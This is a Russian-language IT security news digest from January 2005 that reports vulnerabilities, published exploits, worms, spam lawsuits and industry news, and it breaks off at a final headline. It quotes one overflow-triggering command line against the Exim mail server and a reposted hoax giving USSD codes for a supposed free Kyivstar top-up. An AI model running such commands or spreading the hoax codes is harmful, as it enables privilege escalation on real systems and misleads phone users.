Мининформсвязи РФ разработало поправки к федеральному закону «Об электронной и цифровой подписи» (ЭЦП), сообщает РБК. Об этом заявил сегодня начальник правового департамента министерства Михаил Якушев. По его словам, в 2004 г. была подготовлена концепция внесения изменения в данный закон и соответствующие технические задания. Документы уже согласованы с федеральными органами исполнительной власти. Планируется, что они будут включены в план законотворческой деятельности в 2005 г. и внесены на рассмотрение Госдумы в осеннюю сессию, указал начальник департамента. Согласно поправкам, в закон в «Об электронной и цифровой подписи» предполагается внести дополнительные нормы, обеспечивающие возможность использования иных электронных аналогов собственноручной подписи. Также, по словам г-на Якушева, предусматривается внесение корректировки для исключения зависимости закона от нормы, применяемой в технологии ЭЦП. Поправки, кроме того, уточняют функции уполномоченного федерального органа исполнительной власти в области использования ЭЦП. Как отметил Михаил Якушев, внесение поправок необходимо, поскольку подзаконные акты к федеральному закону об электронной и цифровой подписи подготовлены не были. В связи с этим, пояснил он, закон, формально вступивший в силу с 10 января 2002 г., «так и не заработал». Существующий закон, кроме того, вступает в противоречие с международной практикой и внутренней законодательной базой РФ.
РБК

16/01/2005 12:49 Взломан сервер "Киевстар"?
Многие пользователи сети Интернет получили рассылку следующего содержания:
"Взломан СЕРВЕР КИЕВСТАР и DJUICE!!!! ВНИМАНИЕ!!! пополнение счета на 10 грн бесплатно! вводите *124*10*38 09 79 05 51 41# (дозвон) потом набирите (второй код нада набирать очень быстро) *125*0001# (дозвон) Спешите напакостить КИЕВСТАР в последние дни его РАБОТЫ!!!!" По-видимому данный постинг имеет явно политический подтекст, связанный с окончанием президентства Леонида Кучмы, поскольку члены его клана владеют пакетами акций компании. Однако сам "Киевстар" утверждает, что таких проблем у них не зафиксировано и об этой информации они слышат впервые. Посоветовали перезвонить в понедельник (!), когда появится кто-то из руководства.
Crime-Research.Ru

16/01/2005 12:14 Эксплоит уязвимости в Exim
Rafael San Miguel Carrasco опубликовал эксплоит, используюший уязвимость популярного MTA Exim, о которой сообщала iDEFENSE. Как пишет автор, он специально не использовал в эксплоите системный вызов setuid (), чтобы предотвратить использование скрипткиддями. Помимо собственно эксплоита автор предложил скипт на Перле fb.pl, который позволяет вычислить код возврата (RET) для конкретной системы.
Эксплоит

16/01/2005 12:01 Эксплоит уязвимости iTunes
Опубликован эксплоит уязвимости в популярном плеере от Apple - iTunes. Как пишет автор, его эксплоит позволяет создать специальный файл формата *.pls, который, будучи запущен в iTunes 4.7, порождает шелл на порту 4444.
Эксплоит

16/01/2005 11:38 Как направить XML в скоростной ряд?
Технология Extensible Markup Language стала практически универсальным средством обмена информацией в онлайне. Но все чаще можно услышать признание, что за преимущества XML подчас приходится платить снижением производительности. Эта проблема породила проекты по ускорению XML-трафика. Их сторонники утверждают, что рационализированный XML ускорит всё от интернет-коммерции до обмена данными между сотовыми телефонами. Но чтобы это произошло, нужно прийти к технологическому консенсусу. Проблема в следующем: сейчас стандарт XML предписывает хранить информацию в виде текста. Это означает, что XML-документ, такой как заказ-наряд или веб-страница, может легко воспринять человек или «считать» машина — при помощи многочисленных редакторов текста или XML-парсеров. Но из-за тенденции XML к созданию очень крупных файлов возникают проблемы производительности. Отчасти причина в требовании, чтобы каждый элемент XML-документа помечался текстовыми метками. К тому же основанные на XML протоколы, называемые веб-сервисами, также генерируют значительный XML-трафик. «XML не только многословен, но и чересчур избыточен с точки зрения пространства, приходящегося на единицу передаваемых полезных данных, — утверждает Джефф Лам, главный технолог компании Leader Technologies, где XML интенсивно используется для проведения телеконференций и где убеждены, что нужно что-то менять. Основным кандидатом на роль средства, способного ускорить работу XML, служит технология, называемая бинарным XML, которая требует использования нового формата, компрессирующего XML-передачи. Sun Microsystems инициировала проект open source Fast Infoset Project, основанный на бинарном XML, а ответственная за XML организация по стандартизации World Wide Web Consortium (WC3) сформировала рабочую группу Binary Characterization Working Group, которая займется переводом XML в двоичный формат.
Подробности

16/01/2005 11:19 Уязвимость в Exim
iDEFENSE сообщает о существовании уязвимости в популярном MTA Exim. Уязвимость носит локальный характер и присутствует в функции dns_build_reverse(). Ошибка, вызывающая переполнение буфера, существует в механизме проверки длины строки, передаваемой в буфер фиксированного размера. Переполнение подобного рода может быть вызвано локальным пользователем при вызове MTA из командной строки с определёнными параметрами. В качестве примера предлагается следующее: /usr/bin/exim -bh ::%A`perl -e 'print pack('L',0xdeadbeef') x 256'. В результате использования уязвимости локальный пользователь может повысить свои полномочия в системе и получить доступ с UID мейлера, т.к., несмотря на то, что Exim запускается с SUID суперпользователя, однако эти полномочия сбрасываются до выполнения кода. В результате локальный пользователь может получить только доступ с важным системным данны (например, к содержимому получаемой и принимаемой почты). Уязвимость обнаружена в версиях 4.40 и 4.41. Аудит исходного кода версии 4.42 также позволяет предполагать наличие уязвимости. Производителем выпущен патч дл 4.43.
Подробное описание

16/01/2005 10:55 Microsoft откажется от выпуска Windows XP для Itanium
Компания Microsoft решила отказаться от дальнейшего развития 64-разрядной версии операционной системы Windows XP для процессоров семейства Intel Itanium. Как сообщает издание Infoworld, данное решение продиктовано тем, что спрос на рабочие станции на базе Itanium не оправдал ожиданий, и в настоящее время ни одна крупная компания таких рабочих станций не поставляет. Последней от их производства отказалась компания Hewlett-Packard в сентябре 2004 года. При отсутствии на рынке оборудования, на которое была ориентирована операционная система, в ее дальнейшем развитии нет никакого смысла. Поэтому вместо выпуска ОС под названием Windows XP 64-Bit Edition Version 2003, Microsoft сконцентрируется на совершенствовании Itanium-версии Windows Server 2003. Ведь на серверном рынке 64-разрядные процессоры Intel и операционные системы для них постепенно завоевывают популярность. Врочем, без 64-разрядной версии Windows XP рынок не останется. В течение первой половины 2005 года Microsoft обещает выпустить ОС Windows XP Professional x64 Edition, предназначенную для ПК и рабочих станций, в которых используются 32-разрядные процессоры с 64-разрядными расширениями. Это процессоры Opteron и Athlon 64 фирмы AMD и некоторые модели процессоров Xeon от Intel.
"Компьюлента"

16/01/2005 10:41 Microsoft выпустила бесплатную утилиту для удаления вредоносных программ
Корпорация Microsoft вместе с серией январских заплаток выпустила небольшую бесплатную утилиту, получившую кодовое обозначение Titan. Эта утилита предназначена для удаления наиболее опасных вредоносных программ - Blaster, Sasser, MyDoom, DoomJuice, Zindos, Berweb/Download.Ject, Gailbot и Nachi. Как сообщается на сайте софтверного гиганта, приложение Titan могут скачать все желающие через центр загрузок Microsoft, специальную веб-страницу, а также службу Windows Update, и автоматические обновления. Правда в последних двух случаях Titan будет невозможно запустить несколько раз, поскольку после автоматической активации и проведения проверки утилита самоуничтожится. Приложение совместимо с операционными системами Windows XP, Windows 2000 и Windows Server 2003. Результаты сканирования накопителей компьютера выводятся на экран в виде небольшого отчета. Корпорация Microsoft планирует выпускать обновленные версии Titan каждый месяц вместе с очередными порциями патчей. Кроме того, при возникновении крупных эпидемий, как и в случае обнаружения наиболее опасных дыр, софтверный гигант будет распространять внеплановые обновления к своей антивирусной утилите. Важно заметить, что Titan не является полноценным антивирусом, поскольку способен идентифицировать лишь ограниченное количество вредоносных программ, получивших наиболее широкое распространение.
Страница для закачки

16/01/2005 09:40 Спустя сутки после аварии сайт LiveJournal возобновил работу
Блоггерский сервис LiveJournal.com, широко популярный в России и других странах бывшего СССР и известный там как "ЖЖ" ("Живой журнал"), возобновил свою работу спустя более суток после аварии, в результате которой оказались на время обесточены его серверы. Cайт перестал функционировать в ночь с пятницы на субботу по московскому времени. Через некоторое время он снова начал отвечать, но вместо работы в обычном режиме на нем появился текст, сообщающий об аварии и о том, что администрации необходимо проверить работоспособность всех ста с лишним серверов. Серверы LiveJournal находятся на технической площадке хостинг-провайдера Internap в американском городе Сиэтл. О том, чем была вызвана авария, не сообщается, однако известно, что в результате инцидента прекратилась не только основная подача электропитания, но по какой-то причине не сработало и резервное питание, специально предусмотренное для таких случаев. Энергоснабжение было восстановлено, однако администрация заявила о необходимости тщательной проверки функциональности всех серверов, чтобы избежать потерь информации. В LiveJournal используются многоуровневые системы резервного копирования, и все данные дублируются на дополнительной хостинговой площадке. Были обнаружены серверы, потерявшие часть данных, и их восстановление потребовало определенного времени. Администрация сайта отмечает, что сайт можно было запустить вновь относительно быстро, однако технические специалисты LiveJournal полагают, что это необходимо делать исключительно после тщательной проверки всего оборудования и всех программных компонентов. Как выяснилось в итоге, проверка заняла более суток, в течение которых пользователи ЖЖ, оставшиеся без любимого инструмента для общения, переживали и строили догадки (подчас абсурдные) о причинах и возможных последствиях случившегося.
Lenta.Ru

15/01/2005 16:32 Пользователям iTunes угрожает опасность
Компания iDefence настоятельно рекомендует пользователям музыкального сервиса Apple iTunes как можно скорее обновить свое клиентское программное обеспечение. Если, конечно, они не хотят стать жертвами злых хакеров. Хакеры, как пишет Vnunet.com, могут добраться до ваших компьютеров с помощью специальным образом подготовленных плей-листов в форматах .m3u или .pls, которые будут "ронять" клиентскую программу и подсаживать на нее трояна. Распознать такой плей-лист можно только по слишком длинному адресу, который, собственно говоря, и является основным орудием взлома. Компания iDefence советует пользователям iTunes обновиться до версии 4.7.1., а также не загружать плей-листы с подозрительных сайтов.
Internet.Ru

15/01/2005 16:16 Червь Net-Worm.Win32.DipNet.d
"Лаборатория Касперского" сообщает о появлении червя Net-Worm.Win32.DipNet.d. Является сетевым вирус-червем, заражающим компьютеры под управлением Windows. Является приложением Windows (PE EXE-файл), имеет размер около 91 КБ, упакован UPX. Размер распакованного файла около 264 KБ. Вирус распространяется, используя уязвимость Microsoft Windows LSASS (MS04-011). Червь содержит в себе 'бекдор' - функцию. После запуска червь копирует себя в системный каталог Windows с произвольным именем. Например: %System%wcss.exe. После чего создает сервис с именем 'WebPoster'. Затем червь регистрирует этот файл в ключе автозапуска системного реестра: [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] "WinNetDDE" = "%System%произвольное имя.exe". После чего оригинальный файл червя удаляется. Червь запускает процедуры выбора IP-адресов для атаки и отсылает на порт TCP 445 запрос. В случае если удаленный компьютер отвечает на соединение, то червь, используя уязвимость LSASS, запускает на удаленной машине свой код. Червь открывает на зараженной машине TCP порт 11768 для приема команд. Функционал "бэкдора" позволяет злоумышленнику получить полный доступ к системе. На зараженном компьютере червь открывает один из следующих интернет сайтов с целью проверки существования соединения с интернетом: www.yahoo.com, www.ebay.com, www.google.com.
"Лаборатория Касперского"

15/01/2005 15:52 В аудиоплеере Linux найдена уязвимость
Аудиоплеер Mpg123 для Linux с открытым исходным кодом содержит уязвимость, позволяющую выполнять произвольный код, встроенный в принимаемый с сервера аудиопоток, сообщили специалисты компании Secunia. Уязвимости присвоена категория опасности «высоко критичная». Специально созданный поток MP2 или MP3 приводит к ошибке переполнения буфера. «Если слушать музыку с хакерского сервера, то это приведет к проникновению в систему», — говорит технологический директор Secunia Томас Кристенсен (Thomas Kristensen). Специалисты Secunia предлагают пользователям Mpg123 воздержаться от прослушивания музыки через плеер, пока разработчики не выпустят «заплатку».
Secunia

15/01/2005 15:17 Британца осудили на 14 лет за кражу базы данных
Британский подданный, работающий в США, приговорен к 14 годам тюремного заключения за кражу информации из корпоративной базы данных, нанесшую ущерб на сумму от $50 до $100 млн. Суд Нью-Йорка признал 35-летнего Филиппа Каммингса (Philip Cummings) виновным в продаже паролей и реквизитов 30 тысяч человек из базы данных компании Teledata Communications, с которой он работал в 1999–2000 годах. Teledata предоставляет банкам и другим клиентам доступ к базам данных кредитных историй. Каммингс будет отбывать наказание в США. Он стал вторым осуждённым по этому делу. Первый преступник получил более трех лет тюрьмы в июне 2004 года. Следствие пока не завершено, поскольку не выявлены все участники преступления.
CNews

15/01/2005 15:06 Microsoft вербует патч-тестеров
Microsoft набирает испытателей программного обеспечения для проверки исправлений перед выпуском компанией ее ежемесячных патчей. Программа Security Update Validation позволяет избранным корпоративным заказчикам и консультантам тестировать поправки к программному обеспечению Microsoft. Однако компания сделала эту программу чисто пригласительной и не рассчитывает привлечь большое число тестеров, пояснила директор Microsoft Security Response Center Дебби Фрай Вильсон. «Это строго контролируемая программа, — сказала она. — Мы пригласили лишь тех участников, с которыми поддерживаем тесные отношения, чтобы быть уверенными в соблюдении конфиденциальности». Программа, которая разрабатывается уже около года, — часть инициативы Microsoft по совершенствованию процедур исправления программного обеспечения и общему повышению степени безопасности продуктов. На прошлой неделе компания выпустила пробную версию анти-spyware продукта, а на этой представила инструмент для удаления червей и вирусов с жестких дисков заказчиков в процессе ежемесячной плановой установки патчей. Участниками программы станут главным образом крупные корпорации-заказчики или партнеры Microsoft. В отличие от заказчиков, желающих попробовать анти-spyware продукт Microsoft, участники программы Microsoft Security Update Validation должны будут придерживаться очень строгих правил, сказала Вильсон. Им придется подписать соглашение о неразглашении информации и выделить на программу значительное число человеко-часов.
Подробности

15/01/2005 13:21 Власти Техаса подали в суд на двух лидеров мировой спам-индустрии
Власти американского штата Техас подали в суд на двух активных рассылателей спама, базирующихся на их территории. Как сообщает агентство Reuters, сумма иска составляет несколько миллионов долларов. В качестве ответчиков выступают студент Техасского университета Райан Питляк (Ryan Pitylak) и Марк Троттер (Mark Trotter), житель штата Калифорния. Они организовали коммерческие компании Leadplex и PayPerAction, которые занимались массовыми несанкционированными рассылками по электронной почте недобросовестной рекламы. По оценкам мониторинговой интернет-фирмы SpamHaus, предприятия Питляка и Троттера входят в пятерку самых активных спамеров мира. Как известно, в настоящее время власти США и ведущие компьютерные компании ведут массированную судебную кампанию против спамеров, опираясь на принятый год назан закон CAN-SPAM Act. К настоящему времени суды различных инстанций постановили закрыть несколько крупных спамерских контор, а их владельцам назначили значительные штрафы.
Lenta.Ru

15/01/2005 12:44 Удалённый сканер уязвимости PHP
В Интернет опубликован первый сканер для удалённого тестирования уязвимости PHP. Автор назвал его rpvs - Remote PHP Vulnerability Scanner. В анонсе автор уточняет, что это не CGI-сканер. Также предоставлены исходные тексты сканера, так что желающие могут с ними ознакомиться.
Cкриншот
Cканер
Исходники

14/01/2005 14:19 Уязвимость в Firefox
Ранее сообщалось о наличии уязвимости в популярном браузере - клоне Mozilla - Firefox. Michael Krax из Германии опубликовал эксплоит этой уязвимости, заключающейся в возможности подмены окна диалога загрузки и безопасности (security and download). Ничего не подозревающий юзверь имеет возможность загрузить абсолютно не тот файл (и не стого сайта), на который он рассчитывает. Если выставлен режим выполнения исполняемых файлов в браузере - последствия могут быть более впечатляющими. Уязвимости подвержены: Firefox 1.0, Mozilla 1.7.5 и Netscape 7.1 на Windows XP SP2 (возможно, и на других ОС).
Подробности

14/01/2005 13:51 Тестирование устойчивости сетевого стека Windows
Николай Малых из forum.protocols.ru сообщает о резултатах тестирования сетевого стека ОС Windows при помощи генератора пакетов Packet Generator (NET_PKTGEN), который можно включчить в качестве модуля ОС Linux (либо встроить в ядро при сборке). Передаём слово автору: "Для настройки генератора пакетов мне потребовалась тестовая машинка и после некоторого количества экспериментов с разными юниксовыми станциями дошли руки до Windows 2000. И вот какая штука обнаружилась. При генерации потока UDP-пакетов в адрес этой станции, она очень быстро (менее минуты) умирала, если для тестирования использовались мелкие пакеты (48 байтов), адресованные в случайные порты UDP. Причем умирали именно сетевые модули ОС. Хост напрочь терял соединение с сетью и при физическом отключении от нее интерфейс автоматически деактивировался, но обратно при ключении уже не поднимался (ни автоматически, ни вручную). Дальше больше - после теплого рестарта сеть также не хотела работать с теми же симптомами. Спасал только Reset или выключение. Вот такие дела, господа. Совсем немного оказалось нужно, чтобы положить сервер Win2K. Да совсем забыл сказать - уровень трафика был достаточно низким - что-то около 5 мбит/с".
Источник

14/01/2005 12:30 InternetExploiter 3.2
Berend-Jan Wever из Нидерландов опубликовал обновлённую веррсию эксплоита уязвимости в ANI-файлах, патч для которого был выпущен M$ на днях (MS05-002). Как пишет сам автор, новая версия эксплоита - 3.2 работает на всех веррсиях SP и локализированных версиях Windows.
Эксплоит

14/01/2005 12:16 За кражу реквизитов доступа в Инернет тюменским хакерам грозит 2 года лишения свободы
Трех студентов тюменского вуза задержали оперативники отдела по борьбе с компьютерными преступлениями при ГУВД Тюменской области. Возбуждено уголовное дело по двум статьям Уголовного кодекса - причинение имущественного ущерба путем обмана и использование вредоносных программ. Как сообщил "Тюменской линии" начальник отдела по борьбе с компьютерными преступлениями Борис Сеногноев, подозреваемые с помощью программы типа "троянского коня" сканировали Интернет, вычисляя пароли и логины пользователей сети. После этого путешествовали по Всемирной паутине за счет других. По словам Сеногноева, потерпевшими оказались юридические лица и граждане. Ущерб, причиненный "компьютерными гениями", составляет от 600 до 1000 рублей. В данный момент студенты находятся под подпиской о невыезде. "Халява" может стоить им до 2 лет лишения свободы.
SecurityLab

14/01/2005 12:05 "Мобильный" червь Cabir обнаружен в России в диком виде
Компания "Лаборатория Касперского" сообщает о первом реальном случае заражения коммуникатора сетевым червем Cabir на территории России. Вредоносная программа Cabir, напомним, была обнаружена в июне прошлого года. Червь, замаскированный под утилиту для защиты смартфона Caribe Security Manager, инфицирует портативные устройства, работающие под управлением операционной системы Symbian OS. После запуска Cabir пытается отыскать доступные через беспроводную связь Bluetooth аппараты и отправить на них свои копии. Каких-либо деструктивных действий вредоносная программа не выполняет, однако ее присутствие на смартфоне может стать причиной чрезмерно быстрого разряда аккумулятора вследствие постоянного использования Bluetooth-связи. Первым носителем червя Cabir в России стал аппарат Nokia 7610. В целом, вредоносная программа обнаружена в диком виде уже в девяти странах - Филиппинах, Сингапуре, Арабских Эмиратах, Китае, Индии, Финляндии, Турции, Вьетнаме и России. Таким образом, отмечают в "Лаборатории Касперского", считавшийся ранее концептуальным сетевой червь уверенно распространяется по всему миру. Специалисты рекомендуют владельцам смартфонов с Symbian OS не использовать беспроводную связь Bluetooth в режиме "видимости для всех", не принимать файлы из неизвестных источников и инсталлировать на коммуникатор специальную утилиту для поиска и удаления Cabir, скачать которую можно отсюда.
"Компьюлента"

14/01/2005 11:49 Уязвимость local root для ядер Linux i386 SMP
Paul Starzetz выявил уязвимость ядер Linux 2.2 => 2.2.27-rc1, 2.4 => 2.4.29-rc1, 2.6 => 2.6.10, cообщает linux.org.ru. Возможна ситуация, когда процесс указывает на страницу виртуальной памяти, отсутствующую в главной памяти. Как результат - непривилегированный пользователь может получить права root на SMP системе.
Описание

14/01/2005 11:36 Создана лучшая альтернатива JPEG
Американские ученые разработали технологию сжатия изображений, которая позволит уменьшить объем снимков в формате JPEG почти на треть без потери их качества. Как сообщает журнал New Scientist, новый алгоритм сжатия, разработанный калифорнийской компанией Allume Systems, может стать альтернативой формату JPEG. Специалисты компании заявляют, что новая версия их технологии сжатия StuffIt позволяет уменьшить размер файлов формата JPEG на 28% без потери качества изображения. При этом в файле формата SIF (StuffIt Image Format) могут храниться изображения в формате JPEG, сжатые 24-битные или 8-битные изображения. В отличие от архивных файлов, в одном файле формата SIF хранится только одно изображение. Помимо изображения, в файле хранится также его пиктограмма и настраиваемый набор атрибутов снимка (метаданных) — например, тип камеры, с помощью которой был сделан снимок, его разрешение, установки камеры во время съемки, и т.д. Подробного описания нового алгоритма, использованного компанией Allume, пока что не приводится. В официальном сообщении компании говорится лишь, что новый алгоритм - это «защищенная патентом технология, представляющая собой новую, более эффективную замену существующему методу компрессии JPEG». Продукт StuffIt Deluxe 9.0, поддерживающий новый алгоритм, уже имеется в продаже. На сайте компании можно также бесплатно скачать ПО, необходимое для декодирования и просмотра изображений в формате SIF.
CNews

14/01/2005 10:17 Обнаружен компьютерный вирус в виде игры "Тетрис"
Специалисты по компьютерной безопасности из компании Sophos объявили об обнаружении нового вируса Cellery, который изображает из себя известную логическую игру "Тетрис". Как сообщает BBC News, при попадании на компьютер-жертву вирус создает для игры програмную группу, имитируя проведенную стандартную установку программы для платформы Windows. При запуске программы она действительно демонстрирует классический тетрис, в который можно играть, а в это время ищет в пределах локальной сети другие уязвимые компьютеры и заражает их, размещая тетрис уже там. Специалисты отмечают, что обнаруженная копия Cellery не наносит реального вреда, а только загружает каналы связи в процессе размножения. Она, скорее всего, не способна к массовому распространению, так как использует не самые эффективные технологии для этого. Тем не менее, очевидна цель вирусописателя - создать вредоносную программу, которая бы не вызывала подозрений у пользователя. Так, в организациях с обширными локальными сетями, где сотрудникам позволено играть на рабочем месте в игры, массовая установка такой программы может быть спокойно воспринята пользователями - например, принята за действия системной администрации. Маскировка вирусов под "невинные" программы - метод, известный давно, однако в последнее время он применяется в основном создателями "шпионов" (spyware), вирусописатели предпочитают рассылать свои продукты по почте и заставлять их сканировать Интернет, не привлекая пользовательского внимания. Однако в свете того, что проблема компьютерной безопасности обсуждается в обществе все чаще, не исключено, что авторы Cellery ставили своей целью изучить эффективность еще одного метода распространения инфекции. Как известно, первый найденный вирус для мобильных платформ Cabir также занимался только размножением, хотя был создан известной хакерской группой. В настоящее время эксперты говорят о серьезном характере вирусной угрозы для мобильных устройств.
Lenta.Ru

14/01/2005 09:14 Суперкомпьютерная система ФБР оказалась "устаревшей и неадекватной"
ФБР испытывает серьезные сложности с обновлением своей компьютерной системы, сообщает Associated Press. Введение ее в эксплуатацию откладывается на неопределенное время, а издержки значительно превысили запланированный уровень. Один из основных компонентов системы - база данных Virtual Case File (VCF), введение в эксплуатацию которой должно было завершить создание обновленной компьютерной сети ФБР и предоставить сотрудникам этого ведомства доступ к 40 миллионам электронных документов по вопросам терроризма. Однако, по словам директора ФБР, VCF оказалась "устаревшей и неадекватной", и ее введение, запланированное на 13 декабря 2004 года, было отложено. В настоящее время программисты корпорации Science Applications International переписывают этот компонент системы заново из-за большого количества ошибок в нем. Как ожидается, эта работа займет несколько месяцев. Два других этапа создания новой системы уже завершены: 30 тысяч новых компьютеров, установленных в отделениях ФБР на местах, введены в эксплуатацию, а между ними проложена и запущена высокоскоростная защищенная сеть, уточняет AP. Стоимость всей системы, известной под названием Trilogy, может превысить 626 миллионов долларов вместо первоначально планируемых 380 миллионов. Вопрос об усовершенствовании технологической базы ФБР остро встал после терактов 11 сентября, когда выяснилось, что Бюро не может выполнять столь простые операции, как пересылка фотографий по электронной почте.
Подробности

13/01/2005 11:46 Системы компьютерной и физической защиты сольются воедино
Очередной компьютерный предсказамус. В 2005 году американские и европейские компании будут интенсивно объединять физические и компьютерные системы безопасности и израсходуют на это свыше $1 млрд, прогнозирует Forrester Research. Традиционно обеспечение физической защиты считается делом технического отдела компании, а обеспечение компьютерной безопасности — делом ее ИТ-подразделения, однако информация о сотрудниках становится все более интегрированной, что позволяет связать обе системы, отмечает в опубликованном на этой неделе отчете аналитик Forrester Research Стив Хант. «Замки, камеры, пропускные системы и даже посты охраны будут модернизироваться и подключаться к тем же вычислительным системам, которые управляют входом в компьютеры и сеть, идентификационными данными и секьюрити-инцидентами, — пишет он. — Следовательно, чтобы вовремя отреагировать на вновь открывающиеся возможности, поставщикам систем ИТ-безопасности нужно спешно искать партнеров среди своих собратьев по системам физической защиты или объединяться с ними». Установление связи между системами физической защиты и системами защиты сетей — один из отзвуков терактов 11 сентября 2001 года. По сравнению с 2004 годом в этом году расходы на такую интеграцию в США и Европе удвоятся и достигнут $1,1 млрд, говорится в отчете. Львиная доля этих затрат придется на государственные проекты по объединению физической и сетевой защиты, такие как система идентификационных карт для работников транспорта, разрабатываемая Агентством безопасности транспорта, и общие карты доступа, используемые Министерством обороны, отмечает Forrester. После доклада о результатах работы Комиссии 9/11 федеральное правительство усиленно занялось интеграцией средств физической и сетевой защиты.
Подробности

13/01/2005 10:45 Взломавший мобильную сеть хакер воровал файлы у выслеживавшего его агента
Правительство США сообщило в среду об обнаружении злоумышленника, который в течение как минимум семи месяцев прошлого года занимался перехватом данных, проходивших в сети провайдера беспроводной связи T-Mobile USA (местного подразделения немецкого концерна Deutsche Telekom). Как удалось установить следствию, пишет агентство Associated Press, хакер читал письма клиентов этого провайдера и мог получать доступ к пересылаемым файлам. Среди клиентов, данные которых перехватывалдись, был и сотрудник Секретной службы США (U.S. Secret Service). Он занимался расследованием деятельности хакерских группировок в рамках проходящей уже более года международной операции "Operation Firewall". Как сообщалось накануне, в рамках этой операции минувшей осенью была пресечена деятельность центральной ячейки хакерской организации ShadowCrew, занимавшейся махинациями с ворованными данными кредитных карт. Кроме того, в поле зрения Секретной службы также находятся известные группировки Carderplanet и Darkprofits. 21-летний Николас Ли Джейкобсен (Nicolas Lee Jacobsen), взломавший T-Moblie, был арестован еще в октябре в своей родной Калифорнии. Выйти на него секретным агентам удалось через отель в городе Баффало, штат Нью-Йорк, откуда он, предположительно, и получал доступ к украденной информации. Однако до того, как хакер был задержан, он успел перехватить несколько важных документов у выслеживавшего его агента Питера Кавиччиа (Peter Cavicchia). Несанкционированное проникновение в сеть было обнаружено оператором еще в конце 2003 года, после чего были начаты следственные действия. Секретная служба занимается охраной первых лиц США и расследованием особо важных преступлений, в число которых входят и крупные случаи хакерства, поэтому она была задействована при расследовании. Агенты вышли на Джейкобсена, и после завершения следственных действий инцидент было решено придать огласке, однако Кавиччиа при этом заявил о желании перейти на другую работу. Кавиччиа является авторитетным спецагентом и принимал участие во многих секретных операциях, специализируясь на высокотехнологичных преступлениях. Он имеет государственные награды, в том числе за участие в расследовании событий 11 сентября 2001 года. В Секретной службе отмечают, что Кавиччиа поступил опрометчиво, храня служебные данные на собственном портативном компьютере, однако отмечают, что его решение об уходе не было принудительным, к тому же в отношении его действий было проведено внутреннее расследование, которое показало, что его просчеты не были серьезными.
Lenta.Ru

13/01/2005 10:34 Опубликован модифицированный код эксплоита уязвимости в IE
Известный китайский исследователь безопасности браузера Internet Explorer Liu Die Yu опубликовал модифицированный код эксплоита уязвимости в IE (winxp-sp2-uptodate), который, по словам автора, отличается от ранее опубликованного Secunia тем, что он "более применим для реальных атак".
ZIP-архив

13/01/2005 10:10 Возможность обхода защиты антивирусного ПО
Darren Bounds из Intrusense, LLC сообщает о возможности обхода защиты антивирусного ПО (а также различных IDS и IPS), осуществляющего фильтрацию содержимого HTTP-трафика. Для обхода подобной защиты предлагается кодировать содержимое графического файла внутри URL в base64 (метод кодирования описан в RFC 2397). Автор опубликовал в Интернет демо-код, внутри которого закодирован вредоносный GIF-файл, при раскрытии которого используется уязвимость в механизме GDI+ Windows (описана и устранена в MS04-028). Тем не менее, как замечает автор, IE не декодирует закодированный файл, однако такие браузеры, как Firefox, Safari, Mozilla и Opera декодируют и, таким образом, вредоносный графический файл будет успешно доставлен на машину жертвы, при этом обойдя защиту антивирусного ПО. Выход, естественно, прост - обновить свою версию ОС. Патчей производителей антивирусного ПО пока не вышло.
Демо-страница

12/01/2005 16:51 В. Путин: У России есть возможность прорыва в сфере информационных технологий
Президент России Владимир Путин видит для России возможность прорыва в сфере информационных технологий, передает ИТАР-ТАСС. По его мнению, "у нас есть и кадровый потенциал, и весомый научных задел". "При эффективном и грамотном использовании этих возможностей страна может добиться серьезного прорыва в информационной сфере", - подчеркнул президент на совещании во вторник по вопросу создания технопарков в сфере информационных технологий, проходившем во время его поездки в Новосибирск. "Формирование современной инфраструктуры информационного сектора экономики должно стать крупным национальным проектом", - убежден В.Путин. Одновременно президент признал, что в сфере информационных технологий "наши позиции пока все еще скромны". "Отечественным компаниям с их ограниченными ресурсами пока трудно конкурировать не только на внешнем, но и на внутреннем рынке", - отметил он. В.Путин считает необходимым определить инструменты государственной поддержки центров информационных технологий, а также продвижение экспорта высокотехнологичных товаров и услуг. "При этом речь может идти не только об особых экономических, налоговых или таможенных режимах", - подчеркнул он.
ИТАР-ТАСС

12/01/2005 16:34 Авторские права -- очередной маразм в Германии.
Согласно информации на LOR (linux.org.ru), "Компания Fujitsu Siemens Computers не удоволетворена решением Мюнхенского регионального суда, предусматривающим уплату сбора за соблюдение авторских прав в размере 12 евро с каждого ПК". Компания выступала в качестве ответчика в Мюнхенском региональном суде по иску ассоциации по авторским правам Wort, который предусматривал уплату обязательного сбора за авторское право с каждого ПК. Компания Fujitsu Siemens Computers однажды уже обращалась к законодателям с заявлением, что уплата сбора за соблюдение авторских прав с каждого ПК не может быть обязательной. Бернд Бишофф прокомментировал это так: "Законодатели должны внести изменения в закон об авторском праве, чтобы стимулировать наше информационное сообщество и создать для него привлекательные условия работы. Компания Fujitsu Siemens Computers также считает, что законодательство в его нынешнем состоянии не дает ассоциациям по авторскому праву веских оснований для сбора за авторское право с каждого ПК. Мнение компании совпадает с мнением производственной федерации Bitkom и других производителей ПК. С их точки зрения, т. к. копирование не является главной функцией ПК (в отличие, например, от сканера или устройства для записи CD), уплата любых сборов за соблюдение авторских прав не может являться обязательной. Сканеры, которые классифицируются как копировальные устройства, ассоциации по авторскому праву облагают сбором в 10,23 евро, устройства для записи CD - 7,50 евро, а устройства для записи DVD - сбором в 9,21 евро.
Подробности

12/01/2005 16:27 Pew: интернет ждут катаклизмы
В ближайшие десять лет хакеры попытаются взять под полный контроль интернет, правительство будет использовать Сеть для слежки за гражданами, цифровое неравенство станет более контрастным, а нелегальная загрузка музыки и фильмов из файлообменных сетей останется процветающим бизнесом. Такую картину нарисовало большинство ИТ-экспертов, опрошенных исследовательским центром Pew в рамках проекта Internet and American Life. Большинство из 1286 опрошенных экспертов считают, что атаки хакеров будут направляться не только на конкретные системы, но и на Сеть в целом. Две трети согласились, что интернет становится основной инфраструктурой поддержки связи и бизнеса, и «как минимум одна опустошительная атака на интернет случится в ближайшие 10 лет». Более половины респондентов считают, что с внедрением компьютеров в автомобили, одежду и другие вещи повседневного быта, правительство и работодатели получат возможность увеличить вмешательство в частную жизнь граждан. Некоторые рассматривают вопрос с другой стороны: правительство станет более открытым и доступным для граждан благодаря интернету, но за счёт оттеснения на задворки общества тех, кто не имеет доступа к Сети. Не изменится только одно — процветание компьютерных пиратов. Половина опрошенных считают, что и через 10 лет мультимедийная продукция будет нелегально загружаться через файлообменные сети, сообщил РС Рro.
CNews

12/01/2005 16:05 О выпущенных бюллетенях Microsoft
